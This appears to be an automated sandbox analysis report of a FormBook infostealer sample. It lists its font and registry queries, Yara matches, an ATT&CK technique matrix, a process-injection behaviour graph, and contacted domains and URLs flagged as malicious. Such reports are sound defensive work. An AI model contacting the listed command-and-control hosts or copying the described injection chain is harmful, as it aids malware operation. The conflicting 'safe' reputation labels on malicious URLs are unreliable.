          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00893CC7 _get_osfhandle,GetLocalTime,SetLocalTime,SetLocalTime,GetLastError,GetLastError,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0087443C GetVersion,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1Shared Modules1Valid Accounts1Valid Accounts1Masquerading1Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsAccess Token Manipulation1Valid Accounts1LSASS MemorySecurity Software Discovery241Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Process Injection712Access Token Manipulation1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSVirtualization/Sandbox Evasion31Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion31LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection712Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDeobfuscate/Decode Files or Information11DCSyncSystem Information Discovery125Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information4Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Software Packing13/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 483640 Sample: TPJX2QwEdXs5sTV.exe Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 31 www.fanpaixiu.xyz 2->31 33 www.438451.com 2->33 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 7 other signatures 2->47 10 TPJX2QwEdXs5sTV.exe 3 2->10         started        signatures3 process4 file5 29 C:\Users\user\...\TPJX2QwEdXs5sTV.exe.log, ASCII 10->29 dropped 57 Writes to foreign memory regions 10->57 59 Injects a PE file into a foreign processes 10->59 14 RegSvcs.exe 10->14         started        17 RegSvcs.exe 10->17         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 14->61 63 Maps a DLL or memory area into another process 14->63 65 Sample uses process hollowing technique 14->65 67 Queues an APC in another process (thread injection) 14->67 19 cmd.exe 14->19         started        22 explorer.exe 14->22 injected 69 Tries to detect virtualization through RDTSC time measurements 17->69 process9 dnsIp10 49 Modifies the context of a thread in another process (thread injection) 19->49 51 Maps a DLL or memory area into another process 19->51 53 Tries to detect virtualization through RDTSC time measurements 19->53 25 cmd.exe 1 19->25         started        35 www.munortiete.com 172.67.147.111, 49810, 80 CLOUDFLARENETUS United States 22->35 37 www.pierrot-bros.com 22->37 39 4 other IPs or domains 22->39 55 System process connects to network (likely due to code injection or exploit) 22->55 signatures11 process12 process13 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          TPJX2QwEdXs5sTV.exe18%ReversingLabsByteCode-MSIL.Spyware.Noon

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.zhongyicts.com.cnue0%URL Reputationsafe
          http://www.carterandcone.comTCd0%Avira URL Cloudsafe
          http://www.carterandcone.comypoC0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.carterandcone.comak0%Avira URL Cloudsafe
          http://www.carterandcone.com-se0%Avira URL Cloudsafe
          http://www.carterandcone.com00%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.zhongyicts.com.cn00%Avira URL Cloudsafe
          http://www.carterandcone.coml-g0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com)0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.carterandcone.com?0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cncom0%Avira URL Cloudsafe
          http://www.carterandcone.comue0%URL Reputationsafe
          http://www.carterandcone.comMic0%Avira URL Cloudsafe
          http://www.goodfont.co.krV0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.carterandcone.como._0%Avira URL Cloudsafe
          http://www.indianadogeavaxsite.site/t75f/?IL3h=sM7Ty9CQqazxDsp1L2wp1X0yz6j8iZQMubl0W4soZskD9oW6nOghj7d5yalvsy0iKmR0GSiRBw==&_hN0=5jFT8RbH3tHLZn0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.carterandcone.coml-se0%Avira URL Cloudsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://fontfabrik.comj0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.goodfont.co.kr-cY0%Avira URL Cloudsafe
          http://www.carterandcone.coma0%URL Reputationsafe
          http://www.carterandcone.comexc0%URL Reputationsafe
          http://www.tiro.comw0%Avira URL Cloudsafe
          http://www.carterandcone.comd0%URL Reputationsafe
          http://www.sajatypeworks.comt0%URL Reputationsafe
          http://www.zhongyicts.com.cno.U0%Avira URL Cloudsafe
          http://www.urwpp.deA0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cno.E0%Avira URL Cloudsafe
          http://en.w0%URL Reputationsafe
          http://www.sakkal.com90%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.zhongyicts.com.cnk0%Avira URL Cloudsafe
          www.438451.com/t75f/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/0%URL Reputationsafe
          http://www.carterandcone.comof0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn00%URL Reputationsafe
          http://www.sakkal.com30%Avira URL Cloudsafe
          http://www.founder.com.cn/cncom0%Avira URL Cloudsafe
          http://www.monotype.0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          https://www.438451.com/t75f/?IL3h=1BeMm2dWByn9xv9J99R2XzKkk0MJMO8GKUMNYM3ZZNvYMz7ACarE0KIXHaUrAW4HLV0%Avira URL Cloudsafe
          http://www.carterandcone.comona0%URL Reputationsafe
          http://www.ascendercorp.com/typedesigners.htmlh0%Avira URL Cloudsafe
          http://www.founder.com.cn/cnicr0%URL Reputationsafe
          http://www.goodfont.co.kX0%Avira URL Cloudsafe
          http://www.sandoll.co.kra-e#0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn(0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.munortiete.com
          172.67.147.111
          truetrue
            unknown
            www.438451.com
            160.202.170.147
            truetrue
              unknown
              domains.readymag.com
              54.194.41.141
              truefalse
                high
                www.fanpaixiu.xyz
                unknown
                unknowntrue
                  unknown
                  www.ice-lemon.pro
                  unknown
                  unknowntrue
                    unknown
                    www.pierrot-bros.com
                    unknown
                    unknowntrue
                      unknown
                      www.indianadogeavaxsite.site
                      unknown
                      unknowntrue
                        unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.indianadogeavaxsite.site/t75f/?IL3h=sM7Ty9CQqazxDsp1L2wp1X0yz6j8iZQMubl0W4soZskD9oW6nOghj7d5yalvsy0iKmR0GSiRBw==&_hN0=5jFT8RbH3tHLZntrue
                        • Avira URL Cloud: safe
                        unknown
                        www.438451.com/t75f/true
                        • Avira URL Cloud: safe
                        low

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.fontbureau.com/designersHTPJX2QwEdXs5sTV.exe, 00000001.00000003.256499107.0000000006041000.00000004.00000001.sdmpfalse
                          high
                          http://www.zhongyicts.com.cnueTPJX2QwEdXs5sTV.exe, 00000001.00000003.252145677.000000000603B000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designersGTPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                            high
                            http://www.carterandcone.comTCdTPJX2QwEdXs5sTV.exe, 00000001.00000003.252658676.000000000603B000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.fontbureau.com/designers/?TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                              high
                              http://www.carterandcone.comypoCTPJX2QwEdXs5sTV.exe, 00000001.00000003.252876215.000000000603B000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.founder.com.cn/cn/bTheTPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers?TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                                high
                                http://www.fontbureau.com/designersDTPJX2QwEdXs5sTV.exe, 00000001.00000003.259100620.000000000603B000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.carterandcone.comakTPJX2QwEdXs5sTV.exe, 00000001.00000003.252394694.000000000603B000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.carterandcone.com-seTPJX2QwEdXs5sTV.exe, 00000001.00000003.252658676.000000000603B000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.carterandcone.com0TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.tiro.comTPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.252797134.000000000603B000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.zhongyicts.com.cn0TPJX2QwEdXs5sTV.exe, 00000001.00000003.252145677.000000000603B000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.carterandcone.coml-gTPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fontbureau.com/designersTPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.257664415.0000000006041000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.257568508.0000000006041000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.fontbureau.com/designers0.TPJX2QwEdXs5sTV.exe, 00000001.00000003.258749887.000000000603B000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.goodfont.co.krTPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.carterandcone.comTPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.carterandcone.com)TPJX2QwEdXs5sTV.exe, 00000001.00000003.252313565.000000000603B000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      http://www.sajatypeworks.comTPJX2QwEdXs5sTV.exe, 00000001.00000003.245363117.0000000006022000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.typography.netDTPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.founder.com.cn/cn/cTheTPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmTPJX2QwEdXs5sTV.exe, 00000001.00000003.262778713.000000000603B000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.260576945.000000000603B000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://fontfabrik.comTPJX2QwEdXs5sTV.exe, 00000001.00000003.246382239.000000000603B000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.carterandcone.com?TPJX2QwEdXs5sTV.exe, 00000001.00000003.252560675.000000000603B000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.zhongyicts.com.cncomTPJX2QwEdXs5sTV.exe, 00000001.00000003.252145677.000000000603B000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.carterandcone.comueTPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.carterandcone.comMicTPJX2QwEdXs5sTV.exe, 00000001.00000003.252833728.000000000603B000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.goodfont.co.krVTPJX2QwEdXs5sTV.exe, 00000001.00000003.250819017.000000000603B000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.galapagosdesign.com/DPleaseTPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.carterandcone.como._TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      http://www.fontbureau.com/designers/0TPJX2QwEdXs5sTV.exe, 00000001.00000003.256690000.0000000006041000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.fonts.comTPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.sandoll.co.krTPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.urwpp.deDPleaseTPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.carterandcone.coml-seTPJX2QwEdXs5sTV.exe, 00000001.00000003.252560675.000000000603B000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.urwpp.deTPJX2QwEdXs5sTV.exe, 00000001.00000003.259240750.0000000006047000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.256166829.0000000006041000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
